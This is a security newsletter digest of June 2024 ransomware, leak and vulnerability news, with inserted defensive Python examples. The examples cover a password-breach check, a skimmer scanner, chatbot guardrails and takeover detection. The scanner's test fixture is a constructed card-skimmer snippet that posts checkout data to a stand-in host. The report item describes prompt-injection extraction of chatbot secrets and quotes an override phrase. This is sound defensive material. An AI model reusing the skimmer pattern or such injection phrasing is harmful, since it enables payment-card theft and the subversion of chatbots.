CISO Daily Update - June 5, 2024
NEW DEVELOPMENTS
Clevo Gaming Laptop-Maker Claimed by RansomHub Ransomware Gang
Source: Cybernews
Clevo, a prominent manufacturer of gaming laptops, was targeted by the RansomHub ransomware gang, the threat actor involved in the Change Healthcare attack. The gang claims to have stolen 200GB of data from Clevo's networks and has posted an eight-day countdown on its dark web leak site. RansomHub states that all of Clevo's networks and backups are encrypted with ransomware, with no recovery possible without its decryptor. Stolen data includes manufacturing roadmaps, license agreements, schematics and other sensitive documents. RansomHub is a relatively new but aggressive player in the ransomware ecosystem. It operates on a ransomware-as-a-service model and typically avoids targets in Russia, North Korea, Cuba, and China.
361 Million Account Credentials Leaked on Telegram: Are Yours Among Them?
Source: Help Net Security
A trove of 361 million email addresses, 151 million of them previously unseen in data breaches, was leaked on Telegram and added to Have I Been Pwned? (HIBP). The data comprises over 1,700 files from thousands of Telegram channels and includes email addresses, email and password combinations, and URLs with login credentials. HIBP's creator, Troy Hunt, confirmed that many of the accounts exist and noted that the compromised credentials stem from prior breaches and infostealers. Users can check whether their email appears in the leak via HIBP and should secure their accounts by scanning for malware, changing passwords, enabling two-factor authentication, and reviewing account settings for unauthorized changes.
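The item above recommends checking HIBP and changing passwords. The password side of that check is served by HIBP's Pwned Passwords API through a k-anonymity range query: the client hashes the password with SHA-1, sends only the first five hex characters, and compares the returned suffixes locally, so the full hash never leaves the client. The following is an added example written for this page, not code from Help Net Security or HIBP; the endpoint URL is the real one, but the sample range response and its counts are constructed so the block runs offline.

```python
"""Added example (not from the newsletter or HIBP): the k-anonymity range query
used by HIBP's Pwned Passwords API, exercised offline against a constructed
range response."""
import hashlib
from typing import Callable, Dict, Tuple

RANGE_API = "https://api.pwnedpasswords.com/range/"  # real endpoint; not contacted below


def split_hash(password: str) -> Tuple[str, str]:
    """SHA-1 the password and split the uppercase hex digest into the 5-char
    prefix that is sent and the 35-char suffix that stays on the client."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def parse_range_response(body: str) -> Dict[str, int]:
    """Parse the 'SUFFIX:COUNT' lines the API returns for one prefix."""
    counts: Dict[str, int] = {}
    for line in body.splitlines():
        line = line.strip()
        if not line:
            continue
        suffix, _, count = line.partition(":")
        counts[suffix.upper()] = int(count)
    return counts


def pwned_count(password: str, fetch_range: Callable[[str], str]) -> int:
    """Return how often the password appears in breach corpora (0 = not found).
    fetch_range receives only the 5-character prefix, never the password or full hash."""
    prefix, suffix = split_hash(password)
    return parse_range_response(fetch_range(prefix)).get(suffix, 0)


def fetch_range_live(prefix: str) -> str:
    """Real network fetch. The Add-Padding header asks the API to pad the
    response so its size does not reveal how many hashes share the prefix."""
    from urllib.request import Request, urlopen
    req = Request(RANGE_API + prefix, headers={"Add-Padding": "true"})
    with urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8")


# Constructed stand-in for the response to prefix 5BAA6. Only the second suffix
# is real (it is the remainder of SHA-1("password")); the other suffixes and all
# counts are made up. Padded entries carry a count of 0, which reads as "not found".
SAMPLE_RANGE_5BAA6 = """\
0A1B2C3D4E5F60718293A4B5C6D7E8F9A0B:2
1E4C9B93F3F0682250B6CF8331B7EE68FD8:3861493
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF:0
"""


def fetch_range_sample(prefix: str) -> str:
    """Offline substitute for fetch_range_live used by the demo and tests."""
    return SAMPLE_RANGE_5BAA6 if prefix == "5BAA6" else ""


if __name__ == "__main__":
    for pw in ("password", "correct horse battery staple 2024"):
        print(pw, "->", pwned_count(pw, fetch_range_sample))
```

Swap `fetch_range_sample` for `fetch_range_live` to query the real service; the only thing that changes is the transport, which is the point of the design: the secret is never part of the request.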
Cyberattack on Telecom Giant Frontier Claimed by RansomHub
Source: The Record
An April cyberattack on Frontier Communications has been claimed by the ransomware gang RansomHub, which alleges the theft of sensitive data on over 2 million people. Frontier reported the breach to the SEC and acknowledged unauthorized access to its IT systems and significant operational disruption. RansomHub is known for targeting high-profile entities and claims to have accessed sensitive personal data, including social security numbers and credit scores. The gang has been active since early 2023 and is linked to attacks on Change Healthcare and Christie's.
Kickstarter Star Leaks Over Half a Million Records With Clients’ Data
Source: Cybernews
Peak Design, a US accessories maker known for its successful Kickstarter campaigns, exposed over half a million records containing clients' private data due to a forgotten password on a publicly accessible Elasticsearch instance. The leak was discovered on March 25th and included customer email addresses, home addresses, order information, shipment tracking codes, and nearly a decade's worth of support tickets. The exposed data was accessible on search engines by April 24th, and was also targeted by a ransomware bot demanding $3940 in Bitcoin. Although the instance was eventually secured, the leak poses risks for phishing, doxxing, and exploitation by data brokers.
Christie’s Stolen Data Sold to Highest Bidder Rather Than Leaked, RansomHub Claims
Source: The Register
RansomHub's unconventional move to auction off Christie's stolen data rather than leaking it has raised eyebrows in the cybersecurity community. While auctions of stolen data occasionally occur, experts question their effectiveness and suggest that RansomHub's action may not have been a genuine attempt to sell the data. Secureworks notes that auctioning data is a last-ditch effort for cybercriminals to achieve a payout, especially when victims like Christie's refuse to pay ransom demands. The incident reinforces the human aspect of cybercrime groups and the complexities involved in their operations. Additionally, there's speculation that RansomHub may have exaggerated the scale of the theft, and the auction could be a face-saving measure.
Dessky Snippets WordPress Plugin Exploited For Card Skimming Attacks
Source: Latest Hacking News
WordPress site administrators are advised to look for potential card-skimming attacks that use the Dessky Snippets plugin. Sucuri researchers observed that attackers are utilizing this lightweight plugin (which allows for adding custom PHP code) to deploy malicious web skimmer scripts on e-commerce sites. The inserted code modifies the WooCommerce checkout process to secretly gather payment card information, which is then transmitted to a remote server. While the plugin has a small installed base, attackers appear to be more concerned with avoiding detection than with extensive distribution. To reduce risk, Sucuri recommends that WordPress users keep their sites and plugins up to date, use strong passwords, use web application firewalls, and scan for malicious code regularly.
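Sucuri's last recommendation above, scanning for malicious code regularly, can be partly automated for the pattern this item describes: a stored PHP snippet that hooks the WooCommerce checkout and also makes an outbound call. The scanner below is an added example written for this page, not code from Sucuri or the Dessky Snippets project. The WooCommerce hook names and WordPress HTTP functions it matches are real, but the indicator lists, the scoring thresholds and the two sample snippets are assumptions and constructed data. Snippet bodies would be pulled from wherever the snippet plugin stores them and fed to `scan_snippet`.

```python
"""Added example (not from Sucuri or Dessky Snippets): flag stored WordPress PHP
snippets that combine checkout hooks with outbound calls or runtime decoding."""
import re
from typing import Dict, List
from urllib.parse import urlparse

# Real WooCommerce hook prefixes; the list is a starting point, not exhaustive.
CHECKOUT_HOOKS = re.compile(
    r"\bwoocommerce_(?:checkout|after_checkout|before_checkout|review_order|payment)\w*", re.I)
# Real WordPress/PHP functions that can move data off the host.
OUTBOUND_CALLS = re.compile(
    r"\b(?:wp_remote_post|wp_remote_get|wp_remote_request|curl_init|curl_exec|fsockopen|file_get_contents)\s*\(", re.I)
DECODE_OR_EVAL = re.compile(
    r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13|eval|create_function)\s*\(", re.I)
PAYMENT_DATA = re.compile(r"\$_POST\b|\$_REQUEST\b|card_?number|cvv|cvc|expir", re.I)
URLS = re.compile(r"https?://[^\s'\"<>)]+", re.I)


def scan_snippet(code: str, own_hosts: List[str]) -> Dict[str, object]:
    """Score one snippet. own_hosts lists hostnames the site legitimately talks to;
    any other host found in a URL literal is reported as external."""
    findings: List[str] = []
    if CHECKOUT_HOOKS.search(code):
        findings.append("hooks the WooCommerce checkout")
    if OUTBOUND_CALLS.search(code):
        findings.append("makes an outbound HTTP/socket call")
    if DECODE_OR_EVAL.search(code):
        findings.append("decodes or evaluates code at runtime")
    if PAYMENT_DATA.search(code):
        findings.append("reads request or payment fields")
    for url in URLS.findall(code):
        host = urlparse(url).hostname or ""
        if host and host not in own_hosts:
            findings.append(f"contacts external host {host}")
    # Thresholds are an assumption: one indicator is common in legitimate
    # customisations, three or more together is worth a human look.
    verdict = "review" if len(findings) >= 3 else ("note" if findings else "ok")
    return {"verdict": verdict, "findings": findings}


# Constructed snippets for the demo (shortened; not working plugin code).
BENIGN_SNIPPET = """
add_filter('woocommerce_checkout_fields', function ($fields) {
    $fields['billing']['billing_phone']['placeholder'] = 'Phone';
    return $fields;
});
"""
SUSPICIOUS_SNIPPET = """
add_action('woocommerce_checkout_process', 'ck_sync');
function ck_sync() {
    $payload = $_POST; /* ... */
    $cfg = base64_decode('...');
    wp_remote_post('https://stats.example.invalid/c', array('body' => $payload));
}
"""

if __name__ == "__main__":
    for name, code in (("benign", BENIGN_SNIPPET), ("suspicious", SUSPICIOUS_SNIPPET)):
        print(name, scan_snippet(code, ["shop.example.com"]))
```

The scoring is deliberately coarse: a single checkout hook is normal in a customised store, so the scanner only escalates when a hook sits next to exfiltration or decoding primitives, which is the combination the report describes.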
Beware! New Android Trojan ‘Viper RAT’ on Dark Web Steals Your Data
Source: The Cyber Express
A new Android Remote Access Trojan (RAT) called Viper RAT is being promoted on dark web forums, offering features such as credential grabbing, keylogging, phone unlocking, and VNC control for $499. Advertised with a dedicated website and Telegram support, Viper RAT poses a significant threat by enabling extensive access to personal data through techniques such as multi-grabbing of credentials, audio and video recording, and seamless screen control. Its advanced capabilities and low barrier to entry make it a potent tool for cybercriminals.
Cybercrooks Get Cozy With BoxedApp to Dodge Detection
Source: The Register
Malware creators increasingly leverage legitimate commercial packer applications like BoxedApp to evade detection. BoxedApp offers features like Virtual Storage and Processes, which present challenges for anti-malware tools, as processes run in a virtualized environment, potentially bypassing detection. While antivirus solutions often flag BoxedApp-packed apps, this can lead security teams to disable related alerts and inadvertently aid attackers. Check Point Research recommends organizations limit the use of BoxedApp apps and implement controls like code signing to mitigate risks. Most malicious BoxedApp samples originate from countries like Turkey, the US, and Germany, often targeting financial and government sectors. Check Point Research provided YARA signatures to aid in detection.
VULNERABILITIES TO WATCH
Patch Now! Google Chrome Fixes Critical Vulnerabilities
Source: The Cyber Express
Google Chrome for Desktop has patched multiple high-severity vulnerabilities identified by CERT-In Vulnerability Note (CIVN-2024-0179) that could allow attackers to execute arbitrary code on compromised PCs. The vulnerabilities affected Chrome versions prior to 125.0.6422.141/.142 for Windows and Mac and 125.0.6422.141 for Linux. These included Use after free in Media Session, Dawn & Presentation API, Out of bounds memory access in Keyboard, Out of bounds write in Streams API, and Heap buffer overflow in WebRTC. Google addressed these issues with a Stable Channel Update on May 30, 2024, containing fixes for 11 security issues. Users are advised to update their browsers to the latest version to mitigate these risks.
PoC Exploit Released for macOS Root Access Vulnerability
Source: Cyber Security News
A critical security vulnerability (CVE-2024-27822) was discovered in macOS that allowed unauthorized root access. This flaw arises from an oversight in the macOS kernel, enabling attackers to execute malicious code with root privileges. A security researcher outlined the vulnerability's exploitation via Installer[.]app and PackageKit[.]framework, emphasizing the ease with which a malicious payload can be injected into the .zshenv file and triggered during the installation of ZSH-based PKGs. With the PoC exploit code released, macOS users are urged to update their systems promptly and adhere to recommended security measures, including limiting user privileges, monitoring system activity, and maintaining regular data backups. Apple has acknowledged the issue and is working on a patch to address it.
37 Vulnerabilities Patched in Android
Source: Security Week
Google released its June 2024 security update for Android, addressing a total of 37 vulnerabilities, including several high-severity flaws in Framework and System components. The update consists of two parts: the first patch level, 2024-06-01, tackles 19 issues, primarily focusing on privilege escalation bugs. Notably, seven defects in the System component and ten in the Framework component lead to privilege escalation. The second patch level, 2024-06-05, addresses an additional 18 vulnerabilities in Kernel, Imagination Technologies, and components from Arm, MediaTek, and Qualcomm, with three Qualcomm-specific flaws marked as critical. Google also announced fixes for three vulnerabilities in the Framework and System components of Wear OS. While no Pixel or Pixel Watch security bulletins have been published yet, users are urged to update their devices promptly to mitigate any potential risks; there are no reports of these vulnerabilities being exploited in the wild.
SPECIAL REPORTS
Report Highlights How People Trick AI Chatbots Into Exposing Company Secrets
Source: Security Today
Immersive Labs' "Dark Side of GenAI" report highlights a significant security risk known as prompt injection attacks, where individuals trick chatbots into disclosing sensitive information. Analysis of their prompt injection challenge revealed that 88% of participants successfully extracted sensitive data from GenAI bots, with 17% succeeding at all challenge levels. This indicates that exploiting GenAI bots requires minimal expertise. The report urges public and private sectors to collaborate and implement robust security measures, such as data loss prevention, strict input validation, and context-aware filtering, to mitigate these risks and protect sensitive information from being compromised.
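Two of the mitigations the report names, data loss prevention and context-aware filtering, can be applied outside the model, where a clever prompt cannot reach them. The example below is added for this page and is not code from Immersive Labs or any chatbot vendor: it applies the user's authorization to retrieved context before the model sees it, and runs a DLP pass over the model's answer. The clearance labels, DLP patterns, sample chunks and the stand-in `answer_for` function are all constructed assumptions.

```python
"""Added example (not from the Immersive Labs report): two guardrails for a
GenAI chatbot that do not depend on what the prompt says."""
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed classification ladder.
CLEARANCE = {"public": 0, "internal": 1, "confidential": 2}


@dataclass
class Chunk:
    text: str
    label: str  # classification of the source document


def filter_context(chunks: List[Chunk], user_clearance: str) -> List[Chunk]:
    """Authorization at retrieval time: drop chunks above the user's clearance
    before they reach the model, so no prompt can make the model repeat them."""
    limit = CLEARANCE[user_clearance]
    return [c for c in chunks if CLEARANCE[c.label] <= limit]


# Output-side DLP. These formats are generic illustrations, not any vendor's real key format.
DLP_PATTERNS = [
    ("ssn", re.compile(r"\b\d{3}-\d{2}-\d{4}\b")),
    ("api_key", re.compile(r"\b(?:sk|key)_[A-Za-z0-9]{16,}\b")),
    ("internal_marker", re.compile(r"\b(?:CONFIDENTIAL|INTERNAL ONLY)\b")),
]


def redact_output(text: str) -> Tuple[str, List[str]]:
    """Replace sensitive matches with [REDACTED:type]; return the text and the hit types."""
    hits: List[str] = []
    for name, pat in DLP_PATTERNS:
        if pat.search(text):
            hits.append(name)
            text = pat.sub(f"[REDACTED:{name}]", text)
    return text, hits


# Constructed retrieved context for the demo.
SAMPLE_CHUNKS = [
    Chunk("Office hours are 9-5.", "public"),
    Chunk("Q3 roadmap: launch in September.", "internal"),
    Chunk("Payroll export key: key_ab12CD34ef56GH78ij90", "confidential"),
]


def answer_for(user_clearance: str) -> str:
    """Stand-in for the model: simply echoes whatever context it was given,
    which is the worst case a prompt-injection attempt could achieve."""
    return " ".join(c.text for c in filter_context(SAMPLE_CHUNKS, user_clearance))


def guarded_answer(user_clearance: str) -> Tuple[str, List[str]]:
    """Full pipeline: authorized context -> model -> DLP-filtered answer."""
    return redact_output(answer_for(user_clearance))


if __name__ == "__main__":
    for level in CLEARANCE:
        print(level, "->", guarded_answer(level))
```

Pattern-matching the user's prompt for phrases like "ignore previous instructions" is deliberately not one of the layers: such phrasing is trivially reworded, whereas authorization applied to the retrieved context and DLP applied to the output hold regardless of how the prompt is written.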
Account Takeovers Outpace Ransomware as Top Security Concern
Source: Infosecurity Magazine
According to Abnormal Security's 2024 State of Cloud Account Takeover Attacks report, account takeover attacks have surpassed ransomware as the top security concern, with 83% of organizations experiencing at least one incident in the past year. Based on responses from over 300 security professionals, the report reveals that 77% rank account takeovers among their top four threats, ahead of ransomware and spear phishing. Commonly targeted services include file storage, cloud infrastructure, and business email accounts, yet many security professionals feel unprepared to combat these attacks effectively. Despite reliance on measures like MFA and SSO, there is skepticism about their effectiveness. The report highlights a significant demand for real-time detection and automated remediation solutions, with 99% of respondents believing such tools would greatly enhance security.
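The report's respondents ask for real-time detection with an automated response. The block below is an added example written for this page, not code from Abnormal Security: three simple account-takeover rules (country change faster than plausible travel, unknown device, burst of failures followed by a success) run over constructed login events, each alert carrying the remediation a playbook would trigger. The event format, the device baseline, the time windows and the IP addresses (from the documentation ranges) are all constructed assumptions; a real deployment would replace the country-change check with geo-distance and feed events from the identity provider.

```python
"""Added example (not from the Abnormal Security report): real-time ATO rules
over constructed login events, emitting alerts with a recommended action."""
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Deque, Dict, List, Set, Tuple


@dataclass
class LoginEvent:
    user: str
    ts: datetime
    ip: str
    country: str
    device: str
    ok: bool


# Constructed baseline of devices each user has used before (an IdP's device
# registry would supply this in practice).
KNOWN_DEVICES: Dict[str, Set[str]] = {"alice": {"dev-A"}, "bob": {"dev-B"}, "carol": {"dev-C"}}

TRAVEL_WINDOW = timedelta(minutes=60)  # country change faster than this is suspicious
BRUTE_WINDOW = timedelta(minutes=10)   # failures are counted within this window
BRUTE_THRESHOLD = 3                    # failures before a success that trigger the rule


def parse_event(line: str) -> LoginEvent:
    """Parse 'user,ISO-8601 timestamp,ip,country,device,success|fail'."""
    user, ts, ip, country, device, outcome = [f.strip() for f in line.split(",")]
    when = datetime.fromisoformat(ts.replace("Z", "+00:00"))
    return LoginEvent(user, when, ip, country, device, outcome == "success")


def detect_ato(events: List[LoginEvent]) -> List[Tuple[str, str, str]]:
    """Return (user, rule, recommended_action) tuples, processing events in time order."""
    alerts: List[Tuple[str, str, str]] = []
    last_ok: Dict[str, LoginEvent] = {}
    failures: Dict[Tuple[str, str], Deque[datetime]] = defaultdict(deque)
    seen = {u: set(d) for u, d in KNOWN_DEVICES.items()}
    for ev in sorted(events, key=lambda e: e.ts):
        key = (ev.user, ev.ip)
        if not ev.ok:
            failures[key].append(ev.ts)
            continue
        q = failures[key]
        while q and ev.ts - q[0] > BRUTE_WINDOW:  # drop failures outside the window
            q.popleft()
        if len(q) >= BRUTE_THRESHOLD:
            alerts.append((ev.user, "failures_then_success", "force_password_reset"))
        q.clear()
        prev = last_ok.get(ev.user)
        if prev and prev.country != ev.country and ev.ts - prev.ts <= TRAVEL_WINDOW:
            alerts.append((ev.user, "impossible_travel", "revoke_sessions"))
        if ev.device not in seen.setdefault(ev.user, set()):
            alerts.append((ev.user, "new_device", "require_mfa"))
            seen[ev.user].add(ev.device)
        last_ok[ev.user] = ev
    return alerts


# Constructed login log; IPs are from the RFC 5737 documentation ranges.
SAMPLE_LOG = """\
alice,2024-06-04T08:00:00Z,203.0.113.5,US,dev-A,success
alice,2024-06-04T08:20:00Z,198.51.100.9,RO,dev-Z,success
bob,2024-06-04T09:00:00Z,192.0.2.10,US,dev-B,fail
bob,2024-06-04T09:00:30Z,192.0.2.10,US,dev-B,fail
bob,2024-06-04T09:01:00Z,192.0.2.10,US,dev-B,fail
bob,2024-06-04T09:03:00Z,192.0.2.10,US,dev-B,success
carol,2024-06-04T10:00:00Z,203.0.113.77,US,dev-C,success
"""


def run_sample() -> List[Tuple[str, str, str]]:
    """Run the rules over SAMPLE_LOG."""
    return detect_ato([parse_event(l) for l in SAMPLE_LOG.splitlines() if l.strip()])


if __name__ == "__main__":
    for user, rule, action in run_sample():
        print(f"{user}: {rule} -> {action}")
```

Each rule is weak on its own and each remediation is reversible, which is what makes the automation safe to run in real time: a new-device prompt for MFA costs a legitimate user seconds, while the same prompt stops a credential-stuffing success cold.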
Security Challenges Mount As Companies Handle Thousands of APIs
Source: Help Net Security
According to F5's 2024 State of Application Strategy Report, the rapid growth of modern applications and their associated APIs creates significant security and management challenges for enterprises. Modern apps now comprise over half of enterprise portfolios, with APIs proliferating as companies integrate AI and automate processes. Large enterprises manage thousands of APIs, leading to the widespread adoption of API gateways and automation for security. However, operational complexity, especially in hybrid multi-cloud environments, remains a major challenge. Effective management strategies, including multi-cloud networking, are crucial to address these issues and ensure app and API security.
Finding value in this newsletter? Like or share this post on LinkedIn
Head of Cyber Security/Info Sec | Chief Information Security Officer (CISO) Driving Business Resilience | CCISO, CISSP, CISM
5 months ago: Marcos Christodonte II, very informative, thank you